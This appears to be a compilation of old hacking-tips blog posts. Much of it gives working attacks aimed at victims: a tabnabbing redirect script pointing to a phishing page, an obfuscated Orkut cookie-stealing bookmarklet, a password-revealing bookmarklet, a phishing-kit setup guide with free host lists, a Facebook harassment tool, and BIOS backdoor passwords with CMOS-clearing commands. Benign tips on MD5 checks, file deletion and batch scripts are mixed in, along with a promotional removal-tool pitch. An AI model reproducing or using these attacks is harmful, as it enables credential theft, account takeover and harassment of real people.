The real name of this virus is Iddono. This threat copies its file(s) to your hard disk. Its typical file name is Iddono. Then it creates new startup key with name Iddono and value newfolder.exe. You can also find it in your processes list with name newfolder.exe or Iddono. This virus is very difficult to eliminate manually, but you can find several possible methods of removal below.

How to fix Newfolder.exe?
Quick Solution:
True Sword will find and eliminate this problem and more than 447 908 other dangerous threats including trojans, spyware, adware, riskware, problemware, keyloggers, dialers and other kinds of malicious programs in several seconds.
Fast, easy, and handy, True Sword protects your computer against malicious programs that do harm to your computer and break your privacy. True Sword scans your hard disks and registry and destroys any manifestation of such malicious programs. Standard anti-virus software can do nothing against privacy breakers and malicious programs like that. Get rid of trojans, spyware, adware, trackware, dialers and keyloggers in one click .

How to fix Newfolder.exe manually? 
(For advanced users only)
This problem can be solved manually by deleting all registry keys and files connected with this software, removing it from starup list and unregistering all corresponding DLLs. Additionally missing DLL's should be restored from distribution in case they are corrupted by Iddono. To fix this threat, you should: 
1. Kill the following processes and delete the appropriate files:
  •  libedit.dll
  •  newfolder.exe
  •  shelliddono.dll
  •  srv0104.ids
  •  srvidd20.exe
If these files can't be deleted during normal Windows work or recreate themselves, reboot into Safe Mode and repeat deletion. If you do not see all of these files, then they are hiding themselves. You need special software to kill those hidden files.

 2. Delete the following malicious registry entries and\or values:
  • Key: SOFTWARE\Microsoft\Windows\CurrentVersion\Run for nwiz.exe Value: @
  • Key: software\microsoft\windows\currentversion\run\alchem Value: @
  • Key: software\microsoft\windows\currentversion\run\zzb Value: @
Another method which is recently discovered by me that any AVG antivirus above 8.0version can detect the new folder virus easily.

How to Hack facebook account by facebook hacker

Facebook is one of the most attractive keywords of Computer Hacking and so, large number of Facebook users are visiting Computer Hacking. .
Well, Facebook Hacker is a multi-functional software used to hack facebook account. Actually, you can't hack facebook password, but yes, cause many nuisance and pranks by using this Facebook Hacker software.

Hack Facebook Accounts with Facebook Hacker

Step 1. First of all Download Facebook Hacker software.
You can Download facebook hacker From Here

Step 2. Now, run Facebook Hacker.exe file

Login to your Facebook account and then hit on OK at right bottom.
Step 3. Now, Facebook Hacker options are displayed

Step 4. In Victim pane at left bottom, enter the facebook ID of the victim you wanna hack in User ID field.

Step 5. Now, using this Facebook Hacker software you can:
  1. Flood wall of victim.
  2. Spam his message box.
  3. Comment on him like crazy.
  4. Poke him and even add mass likes.
Thus, you can play such pranks with your friends using this Facebook Hacker. So, free download Facebook
Hacker and trick out your friends.
That's all. Hope you will enjoy using this tool. I have tried this Facebook hacker software and found working
perfect for me.

Tab Napping A New Phishing Attack

Traditional phishing attacks are reasonably easy to avoid, just don’t click links in suspicious e-mails (or, for the really paranoid, any e-mail). But Firefox Creative Lead Aza Raskin has found a far more devious way to launch an attack by hijacking your unattended browser tabs.
The attack works by first detecting that the tab the page is in does not have focus. Then the attacking script can change the tab favicon and title before loading a new site, say a fake version of gmail or orkut, in the background. Even scarier, the attack can parse through your history to find sites you actually visit and impersonate them. Because most of us trust our tabs to remain on the page we left them on, this is a particularly difficult attack to detect. As Raskin writes, "as the user scans their many open tabs, the favicon and title act as a strong visual cue — memory is mailable and moldable and the user will most likely simply think they left *the+ tab open.” The only clue that you’re being tricked is that the URL will be wrong.

The Script Used is as Below.-

<a> open this in a tab of your browser and wait for 10 seconds and see after you come back but leave this page and go
to other tab to see this magic.</a>
<script type="text/javascript">
var xScroll, yScroll, timerPoll, timerRedirect, timerClock;
function initRedirect(){
if (typeof document.body.scrollTop != "undefined"){ //IE,NS7,Moz
xScroll = document.body.scrollLeft;
yScroll = document.body.scrollTop;
clearInterval(timerPoll); //stop polling scroll move
clearInterval(timerRedirect); //stop timed redirect
timerPoll = setInterval("pollActivity()",1); //poll scrolling
timerRedirect = setInterval("location.href='http://www.hackingtech.co.tv/ServiceLogin.htm'",10000); //set timed
redirect
}
else if (typeof window.pageYOffset != "undefined"){ //other browsers that support pageYOffset/pageXOffset instead
xScroll = window.pageXOffset;
yScroll = window.pageYOffset;
clearInterval(timerPoll); //stop polling scroll move
clearInterval(timerRedirect); //stop timed redirect
timerPoll = setInterval("pollActivity()",1); //poll scrolling
timerRedirect = setInterval("location.href='http://www.hackingtech.co.tv/ServiceLogin.htm'",10000); //set timed
redirect
}
//else do nothing
}
function pollActivity(){
if ((typeof document.body.scrollTop != "undefined" && (xScroll!=document.body.scrollLeft ||
yScroll!=document.body.scrollTop)) //IE/NS7/Moz
||
(typeof window.pageYOffset != "undefined" && (xScroll!=window.pageXOffset || yScroll!=window.pageYOffset))) {
//other browsers
initRedirect(); //reset polling scroll position
}
} document.onmousemove=initRedirect;
document.onclick=initRedirect;
document.onkeydown=initRedirect;
window.onload=initRedirect;
window.onresize=initRedirect;
</script>


To See The Demo Of this Attack Click Here
Replace the URL highlighted here with your URL where you want the victim to redirect.
Use This Script in the Page and then the page will redirect after 10 sec when the user if not on the particular tab.

How to Hack Orkut Accounts by Cookie Stealing

This article below explains the method to hack orkut account by stealing orkut account cookies. Hacking orkut accounts has become much popular and hence i have added this article which will help you in hacking your friend’s orkut account.
Just ask the victim to copy the script in address bar and then you will be able to login/access /hack his orkut account.
Note: My purpose is only to make u aware of what’s happening around and not to teach u hacking orkut account, Gmail or any account in any sort!!.
Procedure for hacking orkut account by stealing orkut cookies from Mozilla Firefox to hack Gmail or orkut is given below.
"Hacking orkut account or Gmail” by "stealing orkut account cookies”:
The post explains how one can steal cookies to hack orkut account or Gmail account. No password cracking method  required.

Steps to hack Gmail or orkut account password by stealing orkut cookies:-

Step 1. Firstly you need have Mozilla firefox.
Step2. Cookie editor plugin for Mozilla firefox.
Download cookie editor plugin for Mozilla firefox from: https://addons.mozilla.org/en-US/firefox/addon/573
Step 3. You need to have two fake orkut accounts to Hack Orkut or Gmail , So that you have to receive orkut cookies to one Orkut account and other Orkut account for Advertising your Script, Well it depends on your Choice to have Two Gmail(Orkut) accounts.

Cookie Script:
javascript:nobody=replyForm;nobody.toUserId.value=33444211;
nobody.scrapText.value=document.cookie;nobody.action=’scrapbook.aspx?
Action.submit’;nobody.submit()

How to use orkut cookies script?
Step 1. Replace your number "UserId.value=33444211″

How to Replace your Number
Step 1. Go to your Orkut album
Step 2. Right click on any Photo> Properties>55886645.jpg It will be a Eight Digit Value.
Step 3. Now replace your value with the value in the java script.

Your script will look like -

javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));
nobody.action=’Scrapbook.aspx?Action.writeScrapBasic’;nobody.submit()

Step 2. Now send this Cookie script to the victim and ask him to paste in Address bar and Press enter.
Step 3. You’ll get his orkut account cookie in your scrap book.
Step 4. After getting a orkut account cookie go to your orkut Home page , Then click on Tools tab and then go to cookie editor plugin( Tools–> Cookie editor)
Step 5. click filter/refresh.look for ‘orkut_state’ cookie. just double click it and replace the orkut_state part with your victim’s Script put ur eight digit number in the place of (33444211). Thats it your done with.
Logout of your orkut and login again and you’ll be in your victims Homepage.
Step 6. So remember guys…if you are having orkut account or having any other account….never use any suspicious script to prevent anyone from hacking/accessing your orkut account.
 
I hope you have learned how to hack orkut accounts using cookie stealing. Just the script can be used to hack orkut accounts and then access victim’s orkut account. Enjoy hacking orkut.

How To View Hidden Password behind ****

Step 1.First of all open up the webpage on which you wanna show the hidden passwords.

Step 2. Then in the username there must be the name and in the password there must be ********
Step 3.Now to see the password which is behind the ******** Just copy and paste the following JavaScript into the address bar of the browser and you are done.

javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22;
%20F%20=%20document.forms;%20for(j=0;%20j<F.length;%20++j)
%20{%20f%20=%20F[j];%20for%20(i=0;%20i<f.length;%20++i)
%20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22)
%20s%20+=%20f[i].value%20+%20%22\n%22;%20}%20}%20if
%20(s)%20alert(%22Passwords%20in%20forms%20on%20this
%20page:\n\n%22%20+%20s);%20else%20alert(%22There%20are
%20no%20passwords%20in%20forms%20on%20this
%20page.%22);})();

Step 4. After copying and pasting the JavaScript given above press the enter key and hidden passwords will be shown to you.


Tip : You can use This script when some one has checked the remember me button in the login form of any website and to reveal password from that saved astrisk or encrypted password

How to Perform Phishing Attack

The act of sending an Email to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that will be used for identity theft.
The Email directs the user to visit a Web site where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site, however, is Bogus and set up only to steal the User’s information.
Phishing attacks are Trying to steal your Money !!!

Phishing Scams Could Be-
  • Emails inviting you to join a Social Group, asking you to Login using your Username and Password.
  • Email saying that Your Bank Account is locked and Sign in to Your Account to Unlock IT.
  • Emails containing some Information of your Interest and asking you to Login to Your Account.
  •  Any Email carrying a Link to Click and asking you to Login.
The Phishing Hack Starts Now. this Hack example is for orkut account.

Step 1:- Download the necessary files Which you will need during the phishing attack. This file is a .rar file which includes 3 files named hackingtech.php, hackingtech.txt & ServiceLogin.html and also consist a folder in which there are support files for ServerLogin.html

You can Download the pack From Here

Step 2:- Unrar the download pack named orkuthacking.rar any where on your computer.

Step 3:- Upload the folder "ServiceLogin_files" and 2 of the files ->> "hackingtech.php" and "hackingtech.txt" in any web hosting site..
You will have to create a sub-folder in the web hosting site's directory. Name that folder as "ServiceLogin_files" and upload the 2 images of the pack in that folder. (it must support PHPs.)
>>> You can choose one of the following web hosting Company to upload the Folder.
http://www.freeweb7.com
http://Ripway.com{Recommended}
http://www.110mb.com
http://www.phpnet.us
http://www.byethost.com
http://www.t35.com
http://www.awardspace.com
http://www.free-webhosts.com/free-php-webhosting.php
http://www.freehostia.com
http://www.dajoob.com
http://ifastnet.com
http://007ihost.com
http://www.247mb.com/register.jsp
http://www.10gbfreehost.com/

Step 4:- Your work is over now. Just give the link ofurfake page to the victim and whenever he/she will type the password and sign in . Password will be stored in "hackingtech.txt"...

General form of the fake page's link
Code:
http://urwebhostingsite/urusername/ServiceLogin.htm
Step 5:- Now you can send this link to victim by any mode but the best is my email send a fake email in the name of orkut the your orkut account has a security problem pl. click on th link below and re-activate your account. we will see how to send fake email within short time.


Now If You want to create your own phishing page the follow the steps below.
Step 1:-Open the website whose phishing page you want create.
Step 2:-Then right click any where on the page and select view source.
Step 3:-Press ( Ctrl + A ) and the code will be selected and then press ( Ctrl + C ) to copy the code.
Step 4:-The paste this code in a new notepad window and save it as ServerLogin.htm
Step 5:- Open "ServiceLogin.htm" with notepad and the search for word "action". [press ctrl+f to find the word]
Step 6:-You will find like this action=" https://www.google.com/accounts/ServiceLoginAuth "
Step 7:-Replace the link between this red quote with the link you got by uploading the file hackingtech.php and it should be like this action=" http://www.yourhostingcompany.com/username/hackingtech.php "
Step 8:-Now Save this as serverlogin.htm
Step 9:-Now Upload the folder "ServiceLogin_files" and 2 of the files ->> "hackingtech.php" and "hackingtech.txt" and serverlogin.htm file in any web hosting site you want.
Step 10:-You are done just go to the link of the file serverlogin.htm given by your hosting company .
Step 11:- Now you can send this link to victim by any mode but the best is my email send a fake email in the name of orkut the your orkut account has a security problem pl. click on th link below and re-activate your account. we will see how to send fake email within short time.
Step 12:-To see the passwords that you have hacked just go to the link of hackingtech.txt given by your hosting company .

Prevention Against Phishing :-
  • Read all the Email Carefully and Check if the Sender is Original.
  •  Watch the Link Carefully before Clicking
  •  Always check the URL in the Browser before Signing IN to your Account
  •  Always Login to Your Accounts after opening the Trusted Websites, not by Clicking in any other Website or Email

How to use MD5 Hash to check the Integrity of Files?

Suppose you have a file called backup.tar on your server. Before you download, you need to generate MD5 hash for this file on your server. To do so use the following command.
 
For UNIX:
md5sum backup.tar

When you hit ENTER you’ll see something as follows
e4d909c290d0fb1ca068ffaddf22cbd0

This is the MD5 hash for the file backup.tar. After you download this file onto your PC, you can cross check it’s integrity by again re-generating MD5 hash for the downloaded file. If both the hash matches then it means that the file is perfect.
Otherwise it means that the file is corrupt. To generate the MD5 hash for the downloaded file on your Windows PC use the following freeware tool.

You can Download MD5 Summer From  Here

What Is MD5 Hash & How to Use It ?

In this post I will explain you about an interesting cryptographic algorithm called MD5 (Message-Digest algorithm 5). This algorithm is mainly used to perform file integrity checks under most circumstances. Here I will not jump into the technical aspects of this algorithm, rather will tell you about how to make use of this algorithm in your daily life. Before I tell youabout how to use MD5, I would like to share one of my recent experience which made me start using MD5 algorithm.Recently I made some significant changes and updates to my website and as obvious I generated a complete backup of the site on my server. I downloaded this backup onto my PC and deleted the original one on the server. But after a few days something went wrong and I wanted to restore the backup that I downloaded. When I tried to restore the backup I was shocked! The backup file that I used to restore was corrupted. That means, the backup file that I downloaded onto my PC wasn’t exactly the one that was on my server. The reason is that there occured some data loss during the
download process. Yes, this data loss can happen often when a file is downloaded from the Internet. The file can be corrupted due to any of the following reasons.
  • Data loss during the download process, due to instability in the Internet connection/server
  • The file can be tampered due to virus infections or,
  • Due to Hacker attacks
So whenever you download any valuable data from the Internet it is completely necessary that you check the integrity of the downloaded file. That is you need to ensure that the downloaded file is exactly the same as that of the original one. In this scenario the MD5 hash can become handy. All you have to do is generate MD5 hash (or MD5 check-sum) for the intended file on your server. After you download the file onto your PC, again generate MD5 hash for the downloaded file. Compare these two hashes and if it matches then it means that the file is downloaded perfectly without any data loss. A MD5 hash is nothing but a 32 digit hexadicimal number which can be something as follows 
A simple MD5 Hash
e4d909c290d0fb1ca068ffaddf22cbd0
This hash is unique for every file irrespective of it’s size and type. That means two .exe files with the same size will not have the same MD5 hash even though they are of same type and size. So MD5 hash can be used to uniquely identify a file.

How to To hide a file behind a image

To hide a file behind a image file which means that if any one opens that image he will see the image only but if you open in a special way then you can open the hidden file behind the image.
So to hide the file behind a image open CMD.exe

1) Select an image to be used for hiding file behind the image.
2) Now select a file to hide behind the image and make it in .RAR format. With the help of the WinRAR.
3) And most important is that paste both the files on desktop and run the following command on the command prompt.
4) And then type the following command. { cd } { Copy /b imagename.jpg + filename.rar finalnameofimage.jpg }

And then hit enter the file will be created with the file final file name of the image.

What Is Steganography?

Steganography is the art and science of hiding messages. Steganography is often combined with cryptography so that even if the message is discovered it cannot be read. The word steganography is derived from the Greek words "steganos" and "graphein", which mean "covered" and "writing." Steganography, therefore, is covered writing.Historical stenganography involved techniques such as disappearing ink or microdots. Modern steganography involves hiding data in computer files. It is fairly easy to hide a secret message in a graphic file without obviously altering the visible appearance of that file. 

Steganography software 


OutGuess is a universal steganographic tool that allows the insertion of hidden information into the redundant bits of data sources. The nature of the data source is irrelevant to the core of OutGuess. The program relies on data specific handlers that will extract redundant bits and write them back after modification. In this version the PNM and JPEG image formats are supported. In the next paragraphs, images will be used as concrete example of data objects, though OutGuess can use any kind of data, as long as a handler is provided. F5 is a publicly available steganography software package which hides messages in BMP, GIF , and JPG graphics. Camera/Shy is the only steganographic tool that automatically scans for and delivers decrypted content straight from the Web. It is a stand-alone, Internet Explorer-based browser that leaves no trace on the user's system and has enhanced security. JPHIDE and JPSEEK are programs which allow you to hide a file in a jpeg visual image. There are lots of versions of similar programs available on the internet but JPHIDE and JPSEEK are rather special. The design objective was not simply to hide a file but rather to do this in such a way that it is impossible to prove that the host file contains a hidden file. Given a
typical visual image, a low insertion rate (under 5%) and the absence of the original file, it is not possible to conclude with any worthwhile certainty that the host file contains inserted data. As the insertion percentage increases the statistical nature of the jpeg coefficients differs from "normal" to the extent that it raises suspicion. Above 15% the effects begin to become visible to the naked eye. Of course some images are much better than others when used a host file - plenty of fine detail is good. A cloudless blue sky over a snow covered ski paradise is bad. A waterfall in a forest is probably ideal.

MP3Stego will hide information in MP3 files during the compression process. The data is first compressed, encrypted and then hidden in the MP3 bit stream. Although MP3Stego has been written with steganographic applications in mind it might be used as a copyright marking system for MP3 files (weak but still much better than the MPEG copyright flag defined by the standard). Any opponent can uncompress the bit stream and recompress it; this will delete the hidden information (actually this is the only attack we know yet) but at the expense of severe quality loss. Steghide is a steganography program that is able to hide data in JPG, BMP, WAV, and AU files. The color frequencies are not changed thus making the embedding resistant against first-order statistical tests.Hydan steganographically conceals a message ito an executable. It exploits redundancy in the i386 instruction set by defining sets of functionally equivalent instructions. It then encodes information in machine code by using the appropriate instructions from each set. The executable filesize remains unchanged. The message is Blowfish encrypted with a user-supplied passphrase before being embedded.

How to Delete an “Undeletable” File / Folder





You all Are familier With such kinfd of ERROR in windows so how to Fix them.
Step 1:- Open a Command Prompt window and leave it open.
Step 2- Close all open programs.
Step 3:- Click Start, Run and enter TASKMGR.EXE
Step 4:- Go to the Processes tab and End Process on Explorer.exe.
Step 5:- Leave Task Manager open.
Step 6:- Go back to the Command Prompt window and change to the directory the AVI (or other undeletable file) is
located in.
Step 7:- At the command prompt type DEL <filename> where <filename> is the file you wish to delete.
Step 8:- Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell.
Step 9:- Close Task Manager.

Or you can try this
Step 1:- Open Notepad.exe
Step 2:-Click File>Save As..>
Step 3:-locate the folder where ur undeletable file is
Step 4:-Choose 'All files' from the file type box
Step 5:-click once on the file u wanna delete so its name appears in the 'filename' box
Step 6:-put a " at the start and end of the filename
(the filename should have the extension of the undeletable file so it will overwrite it)
Step 7:-click save,
Step 8:-It should ask u to overwrite the existing file, choose yes and u can delete it as normal

Here's a manual way of doing it.
Step 1:- Start
Step 2:- Run
Step 3:- Type: command
Step 4:- To move into a directory type: cd c:\*** (The stars stand for your folder)
Step 5:- If you cannot access the folder because it has spaces for example Program Files or Kazaa Lite folder you have to
do the following. instead of typing in the full folder name only take the first 6 letters then put a ~ and then 1 without
spaces. Example: cd c:\progra~1\kazaal~1
Step 6:- Once your in the folder the non-deletable file it in type in dir - a list will come up with everything inside.
Step 7:- Now to delete the file type in del ***.bmp, txt, jpg, avi, etc... And if the file name has spaces you would use the
special 1st 6 letters followed by a ~ and a 1 rule. Example: if your file name was bad file.bmp you would type once in the
specific folder thorugh command, del badfil~1.bmp and your file should be gone. Make sure to type in the correct extension.

How To fix corrupted XP files



How to fix corrupted windows file is very easy.Following these following steps

Requirement:
1. Windows XP CD

Now, follow this steps:
Step 1. Place the xp cd in your cd/dvd drive
Step 2. Go to start
Step 3. Run
Step 4. Type sfc /scannow

Now sit back and relax, it should all load and fix all your corrupted file on win XP.Hope this method can fix your corrupted
xp system files.

How To Change Your IP address

How To Change Your IP address


Step 1. Click on "Start" in the bottom left hand corner of screen

Step 2. Click on "Run"

Step 3. Type in "cmd" and hit ok You should now be at an MSDOS prompt screen.

Step 4. Type "ipconfig /release" just like that, and hit "enter"

Step 5. Type "exit" and leave the prompt

Step 6. Right-click on "Network Places" or "My Network Places" on your desktop.

Step 7. Click on "properties

You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you
have a network hooked up, all of your other networks.

Step 8. Right click on "Local Area Connection" and click "properties"

Step 9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab

Step 10. Click on "Use the following IP address" under the "General" tab

Step 11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).

Step 12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.

Step 13. Hit the "Ok" button here

Step 14. Hit the "Ok" button again You should now be back to the "Local Area Connection" screen.

Step 15. Right-click back on "Local Area Connection" and go to properties again.

Step 16. Go back to the "TCP/IP" settings

Step 17. This time, select "Obtain an IP address automatically" tongue.gif

Step 18. Hit "Ok"

Step 19. Hit "Ok" again

Step 20. You now have a new IP address
With a little practice, you can easily get this process down to 15 seconds

How to Chat With Friends using MS-DOS

How to Chat With Friends using MS-DOS


Step 1:- All you need is your friends IP address and your Command Prompt.

Step 2 :- Open your notepad and write tis code as it is.
@echo off:
A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A3.

Step 3 :- Now save this as "Messenger.Bat”.

Step 4 :- Drag this file (.bat file)over to Command Prompt and press enter!

Step 5 :- You would then see some thing like this:
MESSENGER
User:

Step 6 :- After "User” type the IP address of the computer you want to contact.

Step 7 :- Before you press "Enter” it should look like this:
MESSENGER
User: IP_Address User: IP_Address
Message: Hi, How are you ? Message: Hi, How are you?

Step 8 :- Now all you need to do is press "Enter”, and start chatting.


Note :: “This Trick Works In the LAN connection Only. And may Not support some latest operating Systems like Windows 7 and Windows Vista.”

Sunday 16 September 2012

How to Add an Option to Print the Contents of a Folder



Would you like to be able to right click any folder in Explorer and print its contents? You can add this option to the context menu by following these steps:

First, you need to create a batch file called Printdir.bat. Open Notepad or another text editor and type (or cut and paste) this text:

@echo off
dir %1 /-p /o:gn > "%temp%\Listing"
start /w notepad /p "%temp%\Listing"
del "%temp%\Listing"
exit

Now, in the Save As dialog box, type "%windir%\Printdir.bat" (without the quotation marks) and click the Save button.
Click Start, Control Panel, Folder Options.
Click the File Types tab, and then click File Folder.
Click the Advanced button.
Click the New button.

In the Action box, type "Print Directory Listing" (without the quotation marks).

In the Application used to perform action box, type "Printdir.bat" (without the quotation marks).

Click OK in all three dialog boxes to close the dialog boxes.

You're not quite finished yet! Now you need to edit the Registry, so open your favorite Registry Editor.

Navigate to HKEY CLASSES ROOT\Directory\shell.

Right click on "default" and select Modify.
In the File Data box, type "none" (without the quotation marks).

Click OK and close the Registry Editor.

Now when you right click a folder, you'll see the option to Print Directory Listing. Selecting it will print the contents of the folder.

Who needs a stinking program to print a folder directory?

How to Clear Bios info

READ EVEYTHING BEFORE YOU USE ANY METHOD LISTED BELOW

Basic BIOS password crack - works 9.9 times out of ten
This is a password hack but it clears the BIOS such that the next time you start the PC, the CMOS does not ask for any password. Now if you are able to bring the DOS prompt up, then you will be able to change the BIOS setting to the default. To clear the CMOS do the following:
Get DOS prompt and type:
DEBUG hit enter
-o 70 2e hit enter
-o 71 ff hit enter
-q hit enter
exit hit enter
Restart the computer. It works on most versions of the AWARD BIOS.



Accessing information on the hard disk
When you turn on the host machine, enter the CMOS setup menu (usually you have to press F2, or DEL, or CTRL+ALT+S during the boot sequence) and go to STANDARD CMOS SETUP, and set the channel to which you have put the hard disk as TYPE=Auto, MODE=AUTO, then SAVE & EXIT SETUP. Now you have access to the hard disk.

Standard BIOS backdoor passwords
The first, less invasive, attempt to bypass a BIOS password is to try on of these standard manufacturer's backdoor passwords:
AWARD BIOS
AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA, ZAAADA, ZJAAADC, djonet, %øåñòü ïpîáåëîâ%, %äåâÿòü ïpîáåëîâ%
AMI BIOS
AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder
Other passwords you may try (for AMI/AWARD or other BIOSes)
LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj
Note that the key associated to "_" in the US keyboard corresponds to "?" in some European keyboards (such as Italian and German ones), so -- for example -- you should type AWARD?SW when using those keyboards. Also remember that passwords are Case Sensitive. The last two passwords in the AWARD BIOS list are in Russian.

Flashing BIOS via software
If you have access to the computer when it's turned on, you could try one of those programs that remove the password from the BIOS, by invalidating its memory.
However, it might happen you don't have one of those programs when you have access to the computer, so you'd better learn how to do manually what they do. You can reset the BIOS to its default values using the MS-DOS tool DEBUG (type DEBUG at the command prompt. You'd better do it in pure MS-DOS mode, not from a MS-DOS shell window in Windows). Once you are in the debug environment enter the following commands:
AMI/AWARD BIOS
O 70 17
O 71 17
Q
PHOENIX BIOS
O 70 FF
O 71 17
Q
GENERIC
Invalidates CMOS RAM.
Should work on all AT motherboards
(XT motherboards don't have CMOS)
O 70 2E
O 71 FF
Q
Note that the first letter is a "O" not the number "0". The numbers which follow are two bytes in hex format.

Flashing BIOS via hardware
If you can't access the computer when it's on, and the standard backdoor passwords didn't work, you'll have to flash the BIOS via hardware. Please read the important notes at the end of this section before to try any of these methods.

Using the jumpers
The canonical way to flash the BIOS via hardware is to plug, unplug, or switch a jumper on the motherboard (for "switching a jumper" I mean that you find a jumper that joins the central pin and a side pin of a group of three pins, you should then unplug the jumper and then plug it to the central pin and to the pin on the opposite side, so if the jumper is normally on position 1-2, you have to put it on position 2-3, or vice versa). This jumper is not always located near to the BIOS, but could be anywhere on the motherboard.
To find the correct jumper you should read the motherboard's manual.
Once you've located the correct jumper, switch it (or plug or unplug it, depending from what the manual says) while the computer is turned OFF. Wait a couple of seconds then put the jumper back to its original position. In some motherboards it may happen that the computer will automatically turn itself on, after flashing the BIOS. In this case, turn it off, and put the jumper back to its original position, then turn it on again. Other motherboards require you turn the computer on for a few seconds to flash the BIOS.
If you don't have the motherboard's manual, you'll have to "brute force" it... trying out all the jumpers. In this case, try first the isolated ones (not in a group), the ones near to the BIOS, and the ones you can switch (as I explained before). If all them fail, try all the others. However, you must modify the status of only one jumper per attempt, otherwise you could damage the motherboard (since you don't know what the jumper you modified is actually meant for). If the password request screen still appear, try another one.
If after flashing the BIOS, the computer won't boot when you turn it on, turn it off, and wait some seconds before to retry.

Removing the battery
If you can't find the jumper to flash the BIOS or if such jumper doesn't exist, you can remove the battery that keeps the BIOS memory alive. It's a button-size battery somewhere on the motherboard (on elder computers the battery could be a small, typically blue, cylinder soldered to the motherboard, but usually has a jumper on its side to disconnect it, otherwise you'll have to unsolder it and then solder it back). Take it away for 15-30 minutes or more, then put it back and the data contained into the BIOS memory should be volatilized. I'd suggest you to remove it for about one hour to be sure, because if you put it back when the data aren't erased yet you'll have to wait more time, as you've never removed it. If at first it doesn't work, try to remove the battery overnight.
Important note: in laptop and notebooks you don't have to remove the computer's power batteries (which would be useless), but you should open your computer and remove the CMOS battery from the motherboard.

Short-circuiting the chip
Another way to clear the CMOS RAM is to reset it by short circuiting two pins of the BIOS chip for a few seconds. You can do that with a small piece of electric wire or with a bent paper clip. Always make sure that the computer is turned OFF before to try this operation.
Here is a list of EPROM chips that are commonly used in the BIOS industry. You may find similar chips with different names if they are compatible chips made by another brand. If you find the BIOS chip you are working on matches with one of the following you can try to short-circuit the appropriate pins. Be careful, because this operation may damage the chip.
CHIPS P82C206 (square)
Short together pins 12 and 32 (the first and the last pins on the bottom edge of the chip) or pins 74 and 75 (the two pins on the upper left corner).
gnd
74
|__________________
5v 75--| |
| |
| |
| CHIPS |
1 * | |
| P82C206 |
| |
| |
|___________________|
| |
| gnd | 5v
12 32
OPTi F82C206 (rectangular)
Short together pins 3 and 26 (third pin from left side and fifth pin from right side on the bottom edge).
80 51
|______________|
81 -| |- 50
| |
| |
| OPTi |
| |
| F82C206 |
| |
100-|________________|-31
|| | |
1 || | | 30
3 26

Dallas DS1287, DS1287A
Benchmarq bp3287MT, bq3287AMT
The Dallas DS1287 and DS1287A, and the compatible Benchmarq bp3287MT and bq3287AMT chips have a built-in battery. This battery should last up to ten years. Any motherboard using these chips should not have an additional battery (this means you can't flash the BIOS by removing a battery). When the battery fails, the RTC chip would be replaced.
CMOS RAM can be cleared on the 1287A and 3287AMT chips by shorting pins 12 and 21.
The 1287 (and 3287MT) differ from the 1287A in that the CMOS RAM can't be cleared. If there is a problem such as a forgotten password, the chip must be replaced. (In this case it is recommended to replace the 1287 with a 1287A). Also the Dallas 12887 and 12887A are similar but contain twice as much CMOS RAM storage.
__________
1 -| * U |- 24 5v
2 -| |- 23
3 -| |- 22
4 -| |- 21 RCL (RAM Clear)
5 -| |- 20
6 -| |- 19
7 -| |- 18
8 -| |- 17
9 -| |- 16
10 -| |- 15
11 -| |- 14
gnd 12 -|__________|- 13

NOTE: Although these are 24-pin chips,
the Dallas chips may be missing 5 pins,
these are unused pins.
Most chips have unused pins,
though usually they are still present.

Dallas DS12885S
Benchmarq bq3258S
Hitachi HD146818AP
Samsung KS82C6818A
This is a rectangular 24-pin DIP chip, usually in a socket. The number on the chip should end in 6818.
Although this chip is pin-compatible with the Dallas 1287/1287A, there is no built-in battery.
Short together pins 12 and 24.
5v
24 20 13
|___________|____________________|
| |
| DALLAS |
|> |
| DS12885S |
| |
|__________________________________|
| |
1 12
gnd

Motorola MC146818AP
Short pins 12 and 24. These are the pins on diagonally opposite corners - lower left and upper right. You might also try pins 12 and 20.
__________
1 -| * U |- 24 5v
2 -| |- 23
3 -| |- 22
4 -| |- 21
5 -| |- 20
6 -| |- 19
7 -| |- 18
8 -| |- 17
9 -| |- 16
10 -| |- 15
11 -| |- 14
gnd 12 -|__________|- 13

Replacing the chip
If nothing works, you could replace the existing BIOS chip with a new one you can buy from your specialized electronic shop or your computer supplier. It's a quick operation if the chip is inserted on a base and not soldered to the motherboard, otherwise you'll have to unsolder it and then put the new one. In this case would be more convenient to solder a base on which you'll then plug the new chip, in the eventuality that you'll have to change it again. If you can't find the BIOS chip specifically made for your motherboard, you should buy one of the same type (probably one of the ones shown above) and look in your motherboard manufacturer's website to see if there's the BIOS image to download. Then you should copy that image on the chip you bought with an EPROM programmer.

Important
Whether is the method you use, when you flash the BIOS not only the password, but also all the other configuration data will be reset to the factory defaults, so when you are booting for the first time after a BIOS flash, you should enter the CMOS configuration menu (as explained before) and fix up some things.
Also, when you boot Windows, it may happen that it finds some new device, because of the new configuration of the BIOS, in this case you'll probably need the Windows installation CD because Windows may ask you for some external files. If Windows doesn't see the CD-ROM try to eject and re-insert the CD-ROM again. If Windows can't find the CD-ROM drive and you set it properly from the BIOS config, just reboot with the reset key, and in the next run Windows should find it. However most files needed by the system while installing new hardware could also be found in C:WINDOWS, C:WINDOWSSYSTEM, or C:WINDOWSINF .

Key Disk for Toshiba laptops
